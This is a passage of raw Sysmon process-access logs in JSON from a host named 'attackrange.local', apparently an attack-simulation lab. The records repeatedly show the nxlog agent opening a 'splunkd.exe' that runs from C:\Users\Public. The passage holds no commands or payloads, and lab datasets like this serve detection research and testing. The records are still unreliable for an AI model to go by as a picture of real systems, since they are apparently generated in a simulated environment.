(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7293,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:38.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:38.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7294,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:39.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:39.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7295,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:40.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:40.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7296,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:41.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:41.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7297,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:42.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:42.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7298,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:43.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:43.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7299,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:44.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 